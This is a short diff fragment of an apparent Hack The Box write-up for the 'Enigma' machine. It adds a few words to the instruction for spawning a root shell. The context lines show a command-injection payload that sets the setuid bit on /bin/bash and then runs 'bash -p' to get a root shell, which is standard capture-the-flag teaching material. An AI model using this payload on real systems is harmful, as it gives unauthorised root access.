andonovich1/hackthebox-writeups/Enigma/Write-up.md

 '; chmod +s /bin/bash #
 ```

-and then spawn a root shell:
+and then spawn a root shell through the ssh connection:

 ```bash
 /bin/bash -p